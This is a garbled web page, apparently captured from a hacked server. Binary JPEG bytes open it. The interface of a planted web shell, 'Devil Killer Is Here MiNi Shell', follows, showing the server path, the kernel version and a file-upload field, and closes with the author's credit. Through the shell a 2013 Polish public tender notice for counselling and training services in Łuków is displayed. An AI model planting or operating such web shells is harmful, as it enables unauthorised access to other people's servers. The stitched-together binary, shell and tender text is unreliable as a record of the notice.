JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/169877-N-2013.html

<p class="kh_header"><b>Łuków: Zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych z doradztwa zawodowego oraz wsparcia psychologicznego i prawnego</b><br>
<b>Numer ogłoszenia: 169877 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Broniewskiego 20/26, 21-400 Łuków, woj. lubelskie, tel. 25 798 99 13, faks 25 798 99 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.lukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych z doradztwa zawodowego oraz wsparcia psychologicznego i prawnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania o udzielenie zamówienia publicznego jest zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych z doradztwa zawodowego oraz wsparcia psychologicznego i prawnego, w ramach realizacji projektu Aktywizacja - szansą na lepszą przyszłość, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łukowie, współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie oraz ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych.
1. Przedmiot zamówienia:
Warsztaty w zakresie:
- zajęcia z zakresu doradztwa zawodowego w minimalnej liczbie 5 godzin - zajęcia grupowe oraz 5 godzin / 1 osoba - zajęcia indywidualne. (min. 2 sesje z uczestnikiem)
- zajęcia z zakresu doradztwa psychologicznego w minimalnej liczbie 3 godzin / 1 osoba - zajęcia indywidualne (2 sesje po 1,5 h)
- zajęcia z zakresu doradztwa prawnego w minimalnej liczbie 2 godzin / 1 osoba.
Zakres zamówienia:
Termin szkolenia: Zajęcia wg ustalonego harmonogramu zaakceptowanego przez opiekuna w okresie od dnia podpisania umowy do dnia 15 października 2013 r. w godz. pomiędzy 9:00 - 18:00
Miejsce szkolenia: Łuków.
Warunki lokalowe, sale szkoleniowe oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż
Forma zajęć: zajęcia teoretyczne z częścią w formie warsztatów, zajęcia grupowe oraz konsultacje indywidualne dla każdego uczestnika w łącznej liczbie:
- 5 godzin zajęć grupowych (1 grupa: 10 osób);
- 50 godzin zajęć indywidualnych z doradztwa zawodowego (5 godz. X 10 osób);
- 30 godzin zajęć indywidualnych z doradztwa psychologicznego (3 godz. X 10 osób);
- 20 godzin zajęć indywidualnych z doradztwa prawnego (2 godz. X 10 osób).
Łączna liczba godzin: 5 godzin zajęć grupowych, 100 godzin zajęć indywidualnych.
Zapewnienie cateringu na zajęciach (kawa, herbata, woda gazowana i niegazowana, ciastka)
Liczba uczestników warsztatów: 10 osób (beneficjenci projektu) - 1 grupa
Zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej (odległość dojazdu do 30 km) od miejsca zamieszkania do miejsca prowadzenia usług doradztwa oraz drogi powrotnej.
Ubezpieczenie uczestników szkolenia NNW.
Szczegółowe wymagania Zamawiającego:
a) Wykonawca będzie zobowiązany do opracowania szczegółowych programów szkoleń, które będą obejmowały m. in.: nazwę i zakres szkolenia, czas trwania i sposób organizacji szkolenia, cele szkolenia, plan nauczania określający tematy zajęć w określonych modułach oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej, wykaz niezbędnych środków i materiałów dydaktycznych, imienną listę trenerów skierowanych do przeprowadzenia szkoleń i szczegółowych harmonogramów szkoleń oraz przedłożenia ich do zaakceptowania Zamawiającemu nie później niż 7 dni od dnia zawarcia umowy (chyba, że strony ustalą termin krótszy).
b) Przeprowadzenie poszczególnych zajęć winno być potwierdzone w listach obecności przeprowadzanych zajęć, każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i osobę szkoloną.
c) Wykonawca zapewni salę szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym
d) Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu zajęć tj.: dziennika zawierającego listę obecności; wymiar godzin i tematy zajęć edukacyjnych; rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć oraz przeprowadzenia wśród uczestników szkoleń:
- ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia (ankietyzacja przed i po zakończeniu szkolenia);
e) Wykonawca zapewni, aby każda z osób otrzymała zaświadczenie o uczestnictwie, odrębne dla każdego rodzaju zajęć tj. uczestnictwie w indywidualnych konsultacjach z psychologiem, indywidualnych konsultacjach z prawnikiem oraz indywidualnych konsultacjach z doradcą zawodowym. Zaświadczenia mają być zgodne ze wzorem zaświadczenia zawartym w rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) - załącznik Nr 1 do rozporządzenia oraz oznaczone logotypami UE i POKL oraz informacją: Projekt systemowy Aktywizacja- szansą na lepszą przyszłość współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Wydania uczestnikom zaświadczeń potwierdzających udział w szkoleniu Wykonawca zapewni materiały dydaktyczne/szkoleniowe dla 10 uczestników zajęć tj. osób niezbędnych do realizacji zajęć oraz materiały biurowe dla uczestników tj. po 1 notatniku A-5 i po 1 długopisie na każdą osobę, które po zakończeniu szkolenia stają się własnością uczestników a nadto jeden dodatkowy egzemplarz opracowanych materiałów przeznaczonych dla Zamawiającego;
f) Wszystkie materiały wydane uczestnikom winny być oznaczone zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki. Logotypy dostępne na stronie internetowej www.wup.lublin.pl.
g) Zamawiający zastrzega sobie prawo do kontroli przebiegu i realizacji szkoleń oraz wprowadzenia adnotacji do dziennika zajęć.
2. Wykonawca zapewni:
- zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej od miejsca zamieszkania do miejsca doradztwa oraz drogi powrotnej.
- ubezpieczenie od następstw nieszczęśliwych wypadków,
- serwis kawowy (tj. kawa, herbata, cukier, woda mineralna gazowana i niegazowana, śmietanka do kawy, ciastka, paluszki) dla każdej osoby podczas zajęć grupowych i indywidualnych,
- sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć.
W szkoleniu wezmą udział osoby skierowane przez Zamawiającego. W szkoleniu nie mogą brać udziału inne osoby. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na szkolenie. Zamawiający przekaże Wykonawcy przed rozpoczęciem szkolenia imienny wykaz, zawierający niezbędne dane osób skierowanych na szkolenie. Zamawiający zastrzega sobie prawo dokonania zmiany osób skierowanych na szkolenie do czasu rozpoczęcia szkolenia oraz w czasie jego trwania, jeżeli będzie możliwa i celowa realizacja programu szkolenia.
Przekazanie zamawiającemu w terminie do 7 dni od dnia zakończenia szkolenia w poszczególnych grupach:
- list obecności uczestników szkoleń,
- list odbioru przez uczestników materiałów szkoleniowych oraz zaświadczeń o ukończeniu szkolenia, z podaniem daty odbioru i czytelnym podpisem uczestnika;
- list odbioru przez uczestników posiłków,
- imiennych pokwitowań zwrotu kosztów dojazdu,
- dzienników szkoleń;
- kopii wszystkich wydanych uczestnikom zaświadczeń o ukończeniu szkolenia,
- ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia,
- testów sprawdzających opanowanie zrealizowanego materiału szkoleniowego,
- protokołu zawierającego analizę przyrostu wiedzy uczestników w trakcie szkolenia oraz analizę opanowania materiału przez uczestników z testu sprawdzającego, a także wszelkiej innej dokumentacji wytworzonej w trakcie realizacji zamówienia.
Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu
warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych, złożonego na
lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu
warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych, złożonego na
lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu
warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych, złożonego na
lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w odniesieniu do Wykonawców, którzy dysponują osobami zdolnymi do wykonania zamówienia, w tym co najmniej jedną osobą posiadającą: - posiadającą licencję doradcy zawodowego lub ukończone studia wyższe z zakresu doradztwa zawodowego lub studia podyplomowe z zakresu doradztwa zawodowego, która przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 szkolenia z zakresu doradztwa zawodowego (dotyczy doradztwa zawodowego);
- osobą posiadającą wykształcenie wyższe magisterskie, tytuł magistra, ukończone studia wyższe na kierunku psychologia, która przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 szkolenia z zakresu wsparcia psychologicznego (dotyczy doradztwa psychologicznego);
- co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie, tytuł magistra, ukończone studia wyższe prawnicze, która przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 szkolenia z zakresu poradnictwa prawnego (dotyczy doradztwa prawnego).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnianiu
warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://splukow.bip4.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum PomocyRodzinie, 
ul. Broniewskiego 20/26, 21-400 Łuków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, 
ul. Broniewskiego 20/26, 21-400 Łuków
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Aktywizacja - szansą na lepszą przyszłość, realizowany przez Powiatowe Centrum Pomocy
Rodzinie w Łukowie, współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w
ramach programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie oraz ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com